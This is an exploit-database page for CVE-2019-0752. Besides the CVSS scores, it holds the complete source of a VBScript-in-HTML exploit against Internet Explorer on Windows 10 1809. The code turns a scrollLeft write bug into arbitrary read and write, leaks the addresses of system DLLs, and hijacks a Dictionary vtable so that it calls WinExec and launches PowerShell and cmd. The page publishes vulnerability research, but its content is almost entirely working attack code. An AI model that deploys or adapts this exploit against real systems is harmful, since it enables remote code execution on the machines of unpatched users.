Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption Exploit

2019-05-2400:00:00

Simon Zuckerbraun

0day.today

167

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

7.6 High

CVSS2

Access Vector

NETWORK

Access Complexity

HIGH

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:H/Au:N/C:C/I:C/A:C

0.972 High

EPSS

Percentile

99.8%

JSON

<!-- Full exploit of ZDI-19-359/ZDI-CAN-7757/CVE-2019-0752                                      -->
<!-- Target: Internet Explorer, Windows 10 1809 17763.316 (Feb. 2019 patch level)               -->
<!-- Vulnerability and original exploit technique by Simon Zuckerbraun (@HexKitchen), Mar. 2019 -->

<!-- [email protected] -->

<!-- Demonstrates taking an arbitrary write primitive with no info leak, and using it to get    -->
<!-- all the way to RCE using no shellcode.                                                     -->

<!-- Note use of CVE-2019-0768 to get VBScript to run on IE/Win10.                              -->
<!--    (h/t: James Forshaw, Google Project Zero)                                               -->

<html>
<meta http-equiv="x-ua-compatible" content="IE=8">
<meta http-equiv="Expires" content="-1">
<body>
	<div id="container1" style="overflow:scroll; width: 10px">
		<div id="content1" style="width:5000000px">
			Content
		</div>
	</div>
<script language="VBScript.Encode">
Dim ar1(&h3000000)
Dim ar2(1000)
Dim gremlin
addressOfGremlin = &h28281000
Class MyClass
	Private mValue
	Public Property Let Value(v)
		mValue = v
	End Property
	Public Default Property Get P
		P = mValue				' Where to write
	End Property
End Class
Sub TriggerWrite(where, val)
	Dim v1
	Set v1 = document.getElementById("container1")
	v1.scrollLeft = val		' Write this value (Maximum: 0x001767dd)
	Dim c
	Set c = new MyClass
	c.Value = where
	Set v1.scrollLeft = c
End Sub
' Our vulnerability does not immediately give us an unrestricted
' write (though we could manufacture one). For our purposes, the
' following is sufficient. It writes an arbitrary DWORD to an
' arbitrary location, and sets the subsequent 3 bytes to zero.
Sub WriteInt32With3ByteZeroTrailer(addr, val)
	TriggerWrite addr    , (val) AND &hff
	TriggerWrite addr + 1, (val\&h100) AND &hff
	TriggerWrite addr + 2, (val\&h10000) AND &hff
	TriggerWrite addr + 3, (val\&h1000000) AND &hff
End Sub
Sub WriteAsciiStringWith4ByteZeroTrailer(addr, str)
	For i = 0 To Len(str) - 1
		TriggerWrite addr + i, Asc(Mid(str, i + 1, 1))
	Next
End Sub
Function ReadInt32(addr)
	WriteInt32With3ByteZeroTrailer addressOfGremlin + &h8, addr
	ReadInt32 = ar1(gremlin)
End Function
Function LeakAddressOfObject(obj)
	Set ar1(gremlin + 1) = obj
	LeakAddressOfObject = ReadInt32(addressOfGremlin + &h18)
End Function
Sub Exploit()
	' Corrupt vt of one array element (the "gremlin")
	TriggerWrite addressOfGremlin, &h4003	' VT_BYREF | VT_I4
	For i = ((addressOfGremlin - &h20) / &h10) Mod &h100 To UBound(ar1) Step &h100
		If Not IsEmpty(ar1(i)) Then
			gremlin = i
			Exit For
		End If
	Next
	
	If IsEmpty(gremlin) Then
		MsgBox "Could not find gremlin"
		Exit Sub
	End If
	
	For i = 0 To UBound(ar2)
		Set ar2(i) = CreateObject("Scripting.Dictionary")
	Next
	
	Set dict = ar2(UBound(ar2) / 2)
	addressOfDict = LeakAddressOfObject(dict)
	vtableOfDict = ReadInt32(addressOfDict)
	scrrun = vtableOfDict - &h11fc
	kernel32 = ReadInt32(scrrun + &h1f1a4) - &h23c90
	winExec = kernel32 + &h5d380
	
	dict.Exists "dummy"		' Make a dispatch call, just to populate pld
	' Relocate pld to ensure its address doesn't contain a null byte
	pld = ReadInt32(addressOfDict + &h3c)
	fakePld = &h28281020
	For i = 0 To 3 - 1
		WriteInt32With3ByteZeroTrailer fakePld + 4 * i, ReadInt32(pld + 4 * i)
	Next
	
	fakeVtable = &h28282828		' ASCII "(((("
	For i = 0 To 21
		If i = 12 Then		' Dictionary.Exists
			fptr = winExec
		Else
			fptr = ReadInt32(vtableOfDict + 4 * i)
		End If
		WriteInt32With3ByteZeroTrailer (fakeVtable + 4 * i), fptr
	Next
	
	WriteAsciiStringWith4ByteZeroTrailer addressOfDict, "((((\..\PowerShell.ewe -Command ""<#AAAAAAAAAAAAAAAAAAAAAAAAA"
	WriteInt32With3ByteZeroTrailer addressOfDict + &h3c, fakePld
	WriteAsciiStringWith4ByteZeroTrailer addressOfDict + &h40, "#>$a = """"Start-Process cmd `""""""/t:4f /k whoami /user`"""""""""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"""
	
	On Error Resume Next
	dict.Exists "dummy"		' Wheeee!!
	
	' A little cleanup to help prevent crashes after the exploit
	For i = 1 To 3
		WriteInt32With3ByteZeroTrailer addressOfDict + &h48 * i, vtableOfDict
		WriteInt32With3ByteZeroTrailer addressOfDict + (&h48 * i) + &h14, 2
	Next
	Erase Dict
	Erase ar2
End Sub
Exploit
</script>
</body>
</html>